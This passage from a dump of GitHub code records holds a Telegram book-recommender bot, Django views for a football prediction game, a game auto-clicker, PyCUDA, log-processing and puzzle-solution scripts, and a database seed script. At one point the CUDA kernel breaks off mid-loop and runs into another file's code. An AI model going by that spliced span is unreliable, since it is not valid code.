recommend(update, context):\n buttons = [[\n 'LightFM',\n #'Hybrid LightFM'\n ]]\n keyboard = ReplyKeyboardMarkup(buttons, one_time_keyboard=True)\n update.message.reply_text(text=recommend_text, reply_markup=keyboard)\n\n return SELECTING_ENGINE\n\n\ndef ask_user_id(update, context):\n update.message.reply_text(text=id_text)\n \n return TYPING_USER\n\n\ndef ask_user_id_again(update, context):\n update.message.reply_text(text=wrongid_text)\n \n return TYPING_USER\n\n\ndef save_user_id(update, context):\n try:\n user_id = int(update.message.text)\n context.user_data['user_ratings'] = fetch_user_ratings_dataset(user_id)\n return recommend(update, context)\n except ValueError:\n return ask_user_id_again(update, context)\n\n\ndef ask_goodreads_id(update, context):\n update.message.reply_text(text=gr_text)\n \n return TYPING_GOODREADS\n\n\ndef ask_goodreads_id_again(update, context):\n update.message.reply_text(text=nouser_text)\n \n return TYPING_GOODREADS\n\n\ndef save_goodreads_id(update, context):\n try:\n goodreads_id = int(re.search('[0-9]+', update.message.text).group())\n context.user_data['user_ratings'] = fetch_user_ratings_goodreads(goodreads_id)\n return recommend(update, context)\n except:\n return ask_goodreads_id_again(update, context)\n\n \ndef inform_books_rating(update, context):\n update.message.reply_text(text=rating_text)\n \n return ask_book_rating(update, context)\n\n\ndef ask_book_rating(update, context):\n buttons = [['Finish']]\n keyboard = ReplyKeyboardMarkup(buttons, one_time_keyboard=True)\n update.message.reply_text(text=askbook_text, reply_markup=keyboard)\n \n return TYPING_BOOK\n\n\ndef save_selected_book(update, context):\n book_name = update.message.text\n selected_book = process.extract(book_name, book_map['title'].values, scorer=fuzz.ratio)[0][0]\n context.user_data['selected_book'] = selected_book\n\n return show_selected_book(update, context)\n\n\ndef show_selected_book(update, context):\n buttons = [['1', '2', '3', '4', '5'],\n ['Cancel', 'Finish']]\n keyboard = ReplyKeyboardMarkup(buttons, one_time_keyboard=True)\n update.message.reply_text(text=fancy_title(context.user_data['selected_book']),\n parse_mode='HTML',\n disable_web_page_preview=True)\n update.message.reply_text(text=nowrate_text, reply_markup=keyboard)\n\n return SELECTING_RATING\n\n\ndef save_book_rating(update, context):\n book_rating = int(update.message.text)\n context.user_data['rated_dict'][context.user_data['selected_book']] = book_rating\n\n return ask_book_rating(update, context)\n\n\ndef rating_finished(update, context):\n books, rates = zip(*context.user_data['rated_dict'].items())\n book_ids = book_map['id'][book_map['title'].isin(books)].values\n\n context.user_data['user_ratings'] = pd.DataFrame(\n {'user_id': np.repeat(0, len(book_ids)), 'book_id': book_ids, 'rating': rates})\n\n return recommend(update, context)\n\n\ndef rec_lightfm(update, context):\n lightfm = load_model('lightfm1.pickle')\n warn = update.message.reply_text(text=wait_text)\n \n ratings = pd.read_csv('data/ratings.csv')\n dataset = DatasetFaster()\n dataset.fit(ratings.user_id.nunique(), 10000)\n interactions_new, weights_new = dataset.build_interactions(ratings, context.user_data['user_ratings'])\n\n lightfm.fit_partial(\n interactions=interactions_new,\n sample_weight=weights_new\n )\n \n reclist = predict_list(lightfm, context.user_data['user_ratings'])\n # warn.edit_text(text=fancy_list(reclist), parse_mode='HTML', disable_web_page_preview=True)\n rec = update.message.reply_text(text=fancy_list(reclist), parse_mode='HTML', disable_web_page_preview=True)\n\n\nconvhandler = ConversationHandler(\n entry_points=[CommandHandler('start', start)],\n states={\n CHOOSING_SCENARIO: [\n MessageHandler(Filters.regex('^Dataset Id$'), ask_user_id),\n MessageHandler(Filters.regex('^GoodReads Id$'), ask_goodreads_id),\n MessageHandler(Filters.regex('^Custom Setup$'), inform_books_rating)\n ],\n TYPING_USER: [\n MessageHandler(Filters.text & ~Filters.command, save_user_id)\n ],\n TYPING_GOODREADS: [\n MessageHandler(Filters.text & ~Filters.command, save_goodreads_id)\n ],\n TYPING_BOOK: [\n MessageHandler(Filters.text & ~Filters.command & ~Filters.regex('^Finish$'), save_selected_book),\n MessageHandler(Filters.regex('^Finish$'), rating_finished)\n ],\n SELECTING_RATING: [\n MessageHandler(Filters.regex('^[1-5]$'), save_book_rating),\n MessageHandler(Filters.regex('^Finish$'), rating_finished),\n MessageHandler(Filters.regex('^Cancel$'), ask_book_rating)\n ],\n SELECTING_ENGINE: [\n MessageHandler(Filters.regex('^LightFM$'), rec_lightfm),\n # MessageHandler(Filters.regex('^Hybrid LightFM$'), rec_lightfm_hybrid)\n ]\n },\n fallbacks=[CommandHandler('start', start)]\n)\n\n\ndef main():\n TOKEN = os.environ['TOKEN']\n PORT = int(os.environ.get('PORT', '8443'))\n \n updater = Updater(token=TOKEN, use_context=True)\n dispatcher = updater.dispatcher\n dispatcher.add_handler(convhandler)\n updater.start_webhook(\n listen='0.0.0.0',\n port=PORT,\n url_path=TOKEN,\n webhook_url='https://goodbooks-bot.herokuapp.com/' + TOKEN\n )\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yuasosnin/goodbooks-recommender","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1449174706","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nPREDICTION/VIEWS.py\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nimport os\nimport json\nfrom random import randint\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.utils.safestring import mark_safe\nfrom django.conf import settings\n\nimport common.utility as CU\nimport football.models.football as FM\nimport members.models.members as MM\nimport prediction.models.universal as PU\n\nimport logging\nprog_lg = logging.getLogger('progress')\nexcp_lg = logging.getLogger('exception')\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nUNIVERSAL\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\ndef univ_preds(request):\n bk = FM.TimeMachine.GetTodaysBracket()\n prog_lg.debug(bk)\n context = {\n 'season': bk['season'],\n 'round': bk['round'],\n 'now_dt': mark_safe(json.dumps(MM.Profile_Reporter.GetUserNow(request.user))),\n 'spectrumOpts': [\"Home Win\", \"Away Win\", \"Tie\", \"Abstain\"],\n 'players': mark_safe(json.dumps(FM.Reports_General.GetPlayersBySeason(bk['season']))),\n 'abilsOwned': mark_safe(json.dumps(PU.Reporter.GetAbilitiesOwned(request.user, bk['season']))),\n 'abilsUsedRound': mark_safe(json.dumps(PU.Reporter.GetAbilsUsedByRound(request.user, bk['season'], bk['round']))),\n 'fixture': mark_safe(json.dumps(PU.Reporter_Common.GetFixtureLocalized(bk['season'], bk['round'], request.user))),\n 'predictions': mark_safe(json.dumps(PU.Editor.GetOrCreatePreds(bk['season'], bk['round'], request.user))),\n }\n return render(request, 'pu_predictions.html', context)\n\n\ndef univ_headq(request):\n season = FM.TimeMachine.GetTodaysBracket()['season']\n \n context = {\n 'roster': PU.Reporter.GetUserRoster(request.user, season),\n 'abilsOwned': PU.Reporter.GetAbilitiesOwned(request.user, season),\n 'store': PU.Reporter_Store.GetStoreData(),\n 'storeAvailable': PU.Reporter_Store.GetStoreAvailable(request.user, season),\n }\n return render(request, 'pu_headquarters.html', context)\n\n\ndef univ_ranks(request): \n seasons = FM.Reports_General.GetSeasons()\n #seasons = ['IPL2015']\n season = FM.TimeMachine.GetTodaysBracket()['season']\n roundList = FM.Reports_General.GetRounds(season, \"lastData\")\n roundv = roundList[0] if roundList else None\n \n puRecord = PU.Reporter.GetRecord(request.user, season, roundv) \n rankData = PU.Reporter_Ranks.RunRankData(season, roundv, \"Friends\", request.user)\n \n context = {\n 'seasons': seasons,\n 'roundList': roundList,\n 'modes': [\"Friends\", \"Yours\", \"Top Users\"],\n \n # logged user's performance\n \n 'status': mark_safe(json.dumps(puRecord['status'])),\n 'recordAT': mark_safe(json.dumps(puRecord['recordAT'])),\n 'recordRD': mark_safe(json.dumps(puRecord['recordRD'])),\n 'thresholds': mark_safe(json.dumps(puRecord['thresholds'])),\n \n # points distribution\n \n 'userCntAT': rankData['userCntAT'],\n 'binCntAT': rankData['binCntAT'],\n 'histAT': mark_safe(json.dumps(rankData['histAT'])),\n 'gradeAT': mark_safe(json.dumps(rankData['gradeAT'])),\n 'highlightAT': mark_safe(json.dumps(rankData['highlightAT'])),\n \n 'userCntRD': rankData['userCntRD'],\n 'binCntRD': rankData['binCntRD'],\n 'histRD': mark_safe(json.dumps(rankData['histRD'])),\n 'gradeRD': mark_safe(json.dumps(rankData['gradeRD'])),\n 'highlightRD': mark_safe(json.dumps(rankData['highlightRD'])),\n \n # leaderboards\n \n 'ranksAT': mark_safe(json.dumps(rankData['ranksAT'])),\n 'ranksRD': mark_safe(json.dumps(rankData['ranksRD'])),\n }\n return render(request, 'pu_standings.html', context)\n\n\ndef univ_rules(request):\n context = {\n }\n return render(request, 'pu_rules.html', context)\n\n\ndef universal_jx(request, command):\n \n prog_lg.info(\"ajax edit command: \" + command)\n \n \n if command == 'get_fixtSummary':\n season = request.GET.get('season')\n hret = PU.Reporter.GetFixturesSummary(season) \n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n elif command == 'delete_events': \n hret = PU.Editor_Admin.DeleteEvents()\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n \n elif command == 'update_accumulator': \n hret = PU.Editor.PopTokenAccumulator(request.user)\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n elif command == 'update_buyUpgrade': \n upgradeType = request.POST.get('upgradeType')\n upgradeLevel = request.POST.get('upgradeLevel')\n hret = PU.Editor.UpgradeBuy(request.user, upgradeType, upgradeLevel)\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n \n elif command == 'update_prediction': \n pred_st = request.POST.get('pred_st')\n pred_dx = json.loads(pred_st)\n hret = PU.Editor.SavePrediction(request.user, pred_dx)\n \n bk = FM.TimeMachine.GetTodaysBracket()\n hret.results = {\n 'saveRes': hret.results,\n 'now_dt': MM.Profile_Reporter.GetUserNow(request.user),\n 'abilsOwned': PU.Reporter.GetAbilitiesOwned(request.user, bk['season']),\n 'abilsUsedRound': PU.Reporter.GetAbilsUsedByRound(request.user, bk['season'], bk['round']),\n 'predictions': PU.Editor.GetOrCreatePreds(bk['season'], bk['round'], request.user),\n }\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n elif command == 'get_predictions': \n season = FM.TimeMachine.GetTodaysBracket()['season']\n roundv = request.GET.get('round')\n \n hret = CU.HttpReturn()\n hret.status = 201\n hret.results = {\n 'now_dt': MM.Profile_Reporter.GetUserNow(request.user),\n 'abilsOwned': PU.Reporter.GetAbilitiesOwned(request.user, season),\n 'abilsUsedRound': PU.Reporter.GetAbilsUsedByRound(request.user, season, roundv),\n 'fixture': PU.Reporter_Common.GetFixtureLocalized(season, roundv, request.user),\n 'predictions': PU.Editor.GetOrCreatePreds(season, roundv, request.user),\n }\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n \n elif command == 'get_ranksRnd':\n mode = request.GET.get('mode')\n season = request.GET.get('season')\n \n roundList = FM.Reports_General.GetRounds(season, 'lastData')\n if not roundList:\n roundList = ['01']\n lastRound = roundList[0] # list is sorted descending\n \n results = PU.Reporter_Ranks.RunRankData(season, lastRound, mode, request.user)\n puRecord = PU.Reporter.GetRecord(request.user, season, lastRound)\n \n results = dict(results, **puRecord);\n results['roundList'] = roundList\n \n hret = CU.HttpReturn()\n hret.results = results\n hret.status = 201\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n elif command == 'get_ranks':\n mode = request.GET.get('mode')\n season = request.GET.get('season')\n roundv = request.GET.get('roundv')\n \n results = PU.Reporter_Ranks.RunRankData(season, roundv, mode, request.user)\n puRecord = PU.Reporter.GetRecord(request.user, season, roundv) \n results = dict(results, **puRecord);\n \n hret = CU.HttpReturn()\n hret.results = results\n hret.status = 201\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n \n else:\n msg = \"command invalid: \" + command\n excp_lg.error(msg)\n return JsonResponse(msg, safe=False, status = 404)\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nEND OF FILE\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"","repo_name":"PhilBusko/PersianLeague","sub_path":"prediction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"8845612311","text":"import time\nimport numpy as np\nimport pyautogui\n\npyautogui.moveTo(1520, 800)\npyautogui.click()\n\n\ndef capture():\n position = pyautogui.position()\n screenshot = pyautogui.screenshot(region=(position[0] - 1, position[1] - 1, 1, 1))\n screenshot = np.array(screenshot)\n return screenshot[0, 0]\n\n\nclick_counter = 0\nmax_click = 100\nis_cast = True\nwhile True:\n color_code = capture()\n print(color_code, click_counter)\n if is_cast and color_code[0] > 100 and color_code[1] > 110 and color_code[2] > 110:\n time.sleep(0.5)\n pyautogui.moveTo(1520, 800)\n pyautogui.click()\n click_counter += 1\n is_cast = False\n if color_code[0] > 130 and color_code[1] > 175 and color_code[2] > 110:\n pyautogui.moveTo(1520, 800)\n pyautogui.click()\n click_counter += 1\n is_cast = True\n time.sleep(3)\n if click_counter >= max_click:\n break\n","repo_name":"Bug-Too/clicky","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"4241413541","text":"import atexit\n\nimport numpy as np\n\nimport pycuda.driver as cuda\nimport pycuda.gpuarray as gpuarray\nfrom pycuda.compiler import SourceModule\nfrom pycuda.driver import ctx_flags\n\ncuda.init()\ncudadevice = cuda.Device(0)\ncudacontext = cudadevice.make_context(flags=ctx_flags.SCHED_YIELD)\natexit.register(cudacontext.pop)\n\nimport skcuda\nfrom skcuda.misc import _get_minmax_kernel\nskcuda.misc._global_cublas_allocator = cuda.mem_alloc\n\nfrom .pattern import Pattern\n\n\nclass PatternCUDA(Pattern):\n\n mod = SourceModule(\"\"\"\n __global__ void correlate(float *input, float *patterns, float *result, int range_low, int range_high)\n {\n int x = (threadIdx.x + (blockDim.x*blockIdx.x));\n int y = (threadIdx.y + (blockDim.y*blockIdx.y));\n int iidx = x * 8;\n int ridx = (x * blockDim.y * gridDim.y) + y;\n int pidx = y * 24;\n \n float d;\n result[ridx] = 0;\n \n for (int i=range_low;i d[most]:\n most = key\n\nprint(most, d[most])\n","repo_name":"demidovakatya/notebooks","sub_path":"old_python_code/most_messages.py","file_name":"most_messages.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"17764492765","text":"from subprocess import Popen, PIPE, STDOUT\n\n\ndef test_nbi_jupyterhub():\n p = Popen(['jupyterhub', '--debug'], stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n running = False\n for line in p.stdout:\n if 'JupyterHub is now running at' in str(line):\n running = True\n break\n\n assert running\n","repo_name":"ucphhpc/docker-jupyterhub","sub_path":"hub/tests/test_jupyterhub.py","file_name":"test_jupyterhub.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"72157435424","text":"import pandas as pd\nfrom datetime import datetime\nimport datetime as dt\nimport csv\nimport os\n\n\nVIDNAME = 0\nQ_START = 5\nQ_END = 6\nDB_START = 3\nDB_END = 4\nSIM = 2\nLENGTH = 7\n\nWHITE = '\\u001b[37m'\nBLUE = '\\033[94m'\nGREEN = '\\033[92m'\nYELLOW = '\\033[93m'\nRED = '\\033[91m'\nENDC = '\\033[0m'\nGREY = '\\u001b[38;5;244m'\nBOLD = '\\u001b[1m'\nBOLDOFF = '\\u001b[21m'\nUNDERLINE = '\\u001b[4m'\n\ndef join_from_path(logpath1, logpath2, destdir):\n log1 = pd.read_csv(logpath1, index_col=None)\n log2 = pd.read_csv(logpath2, index_col=None)\n\n result = log1\n\n log1 = log1.reset_index()\n log1.columns.values[0] = 'id'\n log1['id'] = log1.index\n\n nonzero1 = log1.loc[log1['Confidence'] > 0]\n nonzero2 = log2.loc[log2['Confidence'] > 0]\n\n for index1, row1 in nonzero1.iterrows():\n for index2, row2 in nonzero2.iterrows():\n if ((row1['Database Video'] == row2['Database Video']) and ((row2['Start Time'] <= row1['Start Time'] < row2['End Time']) or (row1['Start Time'] <= row2['Start Time'] < row1['End Time']))):\n l1 = row1['End Time'] - row1['Start Time']\n l2 = row2['End Time'] - row2['Start Time']\n p1 = l1 / (l1 + l2)\n p2 = l2 / (l1 + l2)\n newscore = row1['Confidence']*p1 + row2['Confidence']*p2\n result.iloc[index1, result.columns.get_loc('Confidence')] = newscore\n result.iloc[index1, result.columns.get_loc('Start Time')] = min(row1['Start Time'], row2['Start Time'])\n result.iloc[index1, result.columns.get_loc('Query Start Time')] = min(row1['Query Start Time'], row2['Query Start Time'])\n result.iloc[index1, result.columns.get_loc('End Time')] = max(row1['End Time'], row2['End Time'])\n result.iloc[index1, result.columns.get_loc('Query End Time')] = max(row1['Query End Time'], row2['Query End Time'])\n\n # print(result)\n outpath = os.path.join(destdir, \"combined.mp4.csv\")\n result.to_csv(outpath, index=False)\n return outpath\n\ndef read_logfile(logpath, shortestmatch):\n logfile = pd.read_csv(logpath, index_col=None)\n\n df = logfile.groupby('Database Video').sum().reset_index()\n threshold = df['Confidence'].mean() + 1.5*df['Confidence'].std()\n df = df.loc[df['Confidence'] > threshold]\n df['Length'] = (df['End Time'] - df['Start Time']) / 1000.\n df = df.sort_values(['Confidence', 'Length'])\n video_names = df['Database Video'].tolist()\n\n # df['Length'] = df.apply(lambda row: float(row['End Time'] - row['Start Time']) / 1000, axis=1)\n df = df.loc[df['Length'] > shortestmatch]\n logfile = logfile[logfile['Database Video'].isin(df['Database Video']).tolist()]\n logfile['Length'] = (logfile['End Time'] - logfile['Start Time']) / 1000.\n\n with open(\"./results/resultcache.txt\", \"w\") as file:\n for item in video_names:\n file.write(f\"{item}\\n\")\n\n return logfile.to_numpy()\n\ndef str_timestamp(num_ms):\n n_sec = int(dt.timedelta(milliseconds=num_ms).total_seconds())\n\n n_hrs = n_sec // 3600\n n_sec = n_sec % 3600\n\n n_min = n_sec // 60\n n_sec = n_sec % 60\n\n return \"{:02d}:{:02d}:{:02d}\".format(n_hrs, n_min, n_sec)\n\n\ndef print_log(logfile):\n if len(logfile) < 1:\n print(\"NO MATCHES FOUND\")\n return\n print(f\"\\n{BOLD}MATCH(ES) FOUND:{ENDC}\\n\")\n print(\"{}:{:>30}{:>16}{:>20}{:>24}{:>24}\".format(\n \"#\", \"Name of Matching Video\",\"Similarity\",\"Length (sec.)\", \"Range in DB\", \"Range in Query\"))\n for i, row in enumerate(logfile):\n score = row[SIM] * 100\n score_color = RED\n if score > 90:\n score_color = GREEN\n elif score > 75:\n score_color = YELLOW\n\n db_range = \"{} - {}\".format(\n str_timestamp(row[DB_START]),\n str_timestamp(row[DB_END]))\n query_range = \"{} - {}\".format(\n str_timestamp(row[Q_START]),\n str_timestamp(row[Q_END]))\n print(\"{}:\\033[94m{:>30}\\033[0m{}{:>15.3f}%\\033[0m\\u001b[38;5;244m{:>20}{:>24}{:>24}\\033[0m\".format(\n i, row[VIDNAME],score_color,score,row[LENGTH],db_range, query_range))\n print(\"\\n\")\n","repo_name":"cnagda/id-pirated-vid","sub_path":"python/logfile.py","file_name":"logfile.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"69804165982","text":"# 给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是 回文串 。返回 s 所有可能的分割方案。 \n# \n# 回文串 是正着读和反着读都一样的字符串。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:s = \"aab\"\n# 输出:[[\"a\",\"a\",\"b\"],[\"aa\",\"b\"]]\n# \n# \n# 示例 2: \n# \n# \n# 输入:s = \"a\"\n# 输出:[[\"a\"]]\n# \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= s.length <= 16 \n# s 仅由小写英文字母组成 \n# \n# Related Topics 字符串 动态规划 回溯 👍 808 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def partition(self, s: str) -> List[List[str]]: # 回溯+DP\n length = len(s)\n judge = [[False] * length for _ in range(length)]\n sublist = []\n container = []\n for i in range(length):\n judge[i][i] = True\n for start in range(length - 1, 0, -1):\n for end in range(start, length):\n judge[start - 1][end] = (start >= end - 1 or judge[start][end - 1]) \\\n and s[start - 1] == s[end]\n\n def backtrack(start=0):\n if start == length:\n container.append(sublist[:])\n for end in range(start, length):\n if judge[start][end]:\n sublist.append(s[start: end + 1])\n backtrack(end + 1)\n sublist.pop()\n\n backtrack()\n return container\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"xxsddm/Algorithm-Beginner","sub_path":"leetcode/0101-0200/[131]分割回文串.py","file_name":"[131]分割回文串.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7609939139","text":"#!/bin/python3\n\nimport sys\n\nN = int(input())\narr = list(map(int,input().split()))\n\nif all([x % 2 == 0 for x in arr]):\n print(0)\n\nelif all([x % 2 != 0 for x in arr]):\n if N % 2 == 0:\n print(N)\n else:\n print('NO')\n\nelse:\n count = 0\n\n if arr[0] % 2 != 0 and arr[1] % 2 == 0:\n arr[0] += 1\n arr[1] += 1\n count += 2\n\n for i in range(1, N):\n if arr[i] % 2 != 0 and arr[i - 1] % 2 != 0:\n arr[i] += 1\n arr[i - 1] += 1\n count += 2\n if arr[i] % 2 != 0 and arr[i - 1] % 2 == 0:\n if i + 1 != N:\n arr[i] += 1\n arr[i + 1] += 1\n count += 2\n\n if arr[-1] % 2 != 0:\n print('NO')\n else:\n print(count)\n","repo_name":"H-Shen/Collection_of_my_coding_practice","sub_path":"Hackerrank/Algorithms/Fair_Rations.py3","file_name":"Fair_Rations.py3","file_ext":"py3","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"36895552246","text":"from app import app, db\nfrom faker import Faker\nfrom models import User, Product, Brand, Category, Invoice, InvoiceProducts, Invoice, Role\nfrom datetime import datetime\nfrom sqlalchemy.orm import sessionmaker\nimport random\n\nfake = Faker()\n\nwith app.app_context():\n db.create_all()\n def delete_data():\n # this deletes existing db data in columns \n print(\"🦸 Delete_data...\")\n User.query.delete()\n Product.query.delete()\n Category.query.delete()\n Brand.query.delete()\n Invoice.query.delete()\n InvoiceProducts.query.delete()\n Role.query.delete()\n \n def seed_data():\n print(\"🦸♀️ Seeding User Roles...\")\n admin_role = Role(name='Admin')\n db.session.add(admin_role)\n\n client_role = Role(name='Client')\n db.session.add(client_role)\n\n print(\"🦸♀️ Seeding Users with Faker...\")\n roles = [1] + [random.choice([2, 3, 4]) for _ in range(49)]\n\n for i in range(50): # Generate 50 fake users\n user = User(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n username=fake.user_name(),\n email=fake.email(),\n ph_address=fake.address(),\n password=fake.password(),\n telephone=fake.phone_number(),\n city_town=fake.city(),\n role=roles[i] \n )\n db.session.add(user)\n\n db.session.commit()\n\n print(\"🦸♀️ Seeding Brands with Faker...\")\n for _ in range(50): # Generate 2 fake brands\n brand = Brand(\n brand_name=fake.company(),\n brand_logo=fake.url()\n )\n db.session.add(brand)\n\n categories = (\"skin\", \"face\", \"nails\", \"eyes\", \"hair\")\n print(\"🦸♀️ Seeding Categories with Faker...\")\n for _ in range(5): # Generate 4 fake categories\n category_name = fake.unique.random_element(elements=categories)\n category = Category(cat_name=category_name)\n db.session.add(category)\n\n print(\"🦸♀️ Seeding Products with Faker...\")\n product_1 = Product(image=\"https://images.pexels.com/photos/3373739/pexels-photo-3373739.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1\", p_name=\"Huddah Lipstick - Red Velvet\", description=\"High-quality red lipstick that provides a smooth and long-lasting finish. Perfect for any occasion.\", price=200, quantity=30, category=1, brand=1)\n product_2 = Product(image=\"https://images.pexels.com/photos/5403543/pexels-photo-5403543.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1\", p_name=\"Rihanna Mascara - Volume Boost\", description=\"Achieve voluminous lashes with Rihanna's mascara. This mascara lifts, separates, and adds volume for a dramatic look.\", price=100, category=1,quantity=50, brand=2)\n product_3 = Product(image=\"https://images.pexels.com/photos/3685523/pexels-photo-3685523.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1\", p_name=\"Urban Chic Eyeshadow Palette\", description=\"Explore a variety of shades with this eyeshadow palette. From subtle neutrals to bold colors, create endless eye looks.\", price=250, category=3, quantity=200 ,brand=1)\n product_4 = Product(image=\"https://images.pexels.com/photos/2661256/pexels-photo-2661256.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Luxury Makeup Brush Set\", description=\"Upgrade your makeup routine with this luxurious brush set. The soft bristles and ergonomic handles ensure a flawless application.\", price=150, category=4,quantity=34, brand=2)\n product_5 = Product(image=\"https://images.pexels.com/photos/6417915/pexels-photo-6417915.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Maybelline Lip Gloss - Pink Delight\", description=\"Shiny and moisturizing lip gloss by Maybelline. Add a pop of color and shine to your lips with this Pink Delight shade.\", price=120, category=1,quantity=70, brand=3)\n product_6 = Product(image=\"https://images.pexels.com/photos/5849420/pexels-photo-5849420.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"MAC Blush Brush\", description=\"Sculpt and define your cheeks with this MAC blush brush. Soft and angled bristles make application easy and precise.\", price=50, category=4,quantity=390 , brand=4)\n product_7 = Product(image=\"https://images.pexels.com/photos/7797740/pexels-photo-7797740.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Maybelline Lipstick - Coral Crush\", description=\"Vibrant coral lipstick by Maybelline. Provides a creamy texture and bold color payoff.\", price=180, category=1, quantity=100 , brand=3)\n product_8 = Product(image=\"https://images.pexels.com/photos/6476122/pexels-photo-6476122.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"MAC Foundation - Natural Glow\", description=\"Lightweight foundation for a natural glow. Blends seamlessly and provides all-day coverage.\", price=280, category=2,quantity=94, brand=4)\n product_9 = Product(image=\"https://images.pexels.com/photos/3997378/pexels-photo-3997378.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Rihanna Face Cream - Hydrating Moisture\", description=\"Hydrating face cream by Rihanna. Infused with moisturizing ingredients for soft and supple skin.\", price=220, category=2,quantity=60, brand=2)\n product_10 = Product(image=\"https://images.pexels.com/photos/5871834/pexels-photo-5871834.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"MAC Concealer - Full Coverage\", description=\"Full coverage concealer by MAC. Conceals imperfections and brightens the under-eye area.\", price=150, category=2, quantity=20, brand=4)\n product_11 = Product(image=\"https://images.pexels.com/photos/3115708/pexels-photo-3115708.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Maybelline Eyeshadow Palette - Bold Hues\", description=\"Dive into a world of bold hues with this Maybelline eyeshadow palette. Create vibrant and daring eye looks with a mix of matte and shimmer shades.\", price=280, category=3,quantity=150, brand=3)\n product_12 = Product(image=\"https://images.pexels.com/photos/279480/pexels-photo-279480.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Huddah Makeup Brush Set\", description=\"High-quality makeup brush set by Huddah Cosmetics. Includes brushes for eyes, face, and lips.\", price=200, category=4,quantity=120, brand=1)\n\n # Add products to the session and commit\n db.session.add_all([\n product_1, product_2, product_3, product_4, product_5, product_6, product_7, product_8, product_9, product_10, product_11, product_12\n ])\n db.session.commit()\n\n print(\"🦸♀️ Seeding Invoices with Faker...\")\n for _ in range(50): # Generate 3 fake invoices\n user = User.query.order_by(User.id).first()\n product = Product.query.order_by(Product.id).first()\n invoice = Invoice(\n users=user,\n products=product,\n quantity=fake.random_int(min=1, max=20),\n cost=fake.random_int(min=10, max=5000)\n )\n db.session.add(invoice)\n\n print(\"🦸♀️ Seeding Invoice_Products with Faker...\")\n products = Product.query.all()\n invoices = Invoice.query.all()\n for _ in range(50): # Generate 6 fake invoice products\n product = 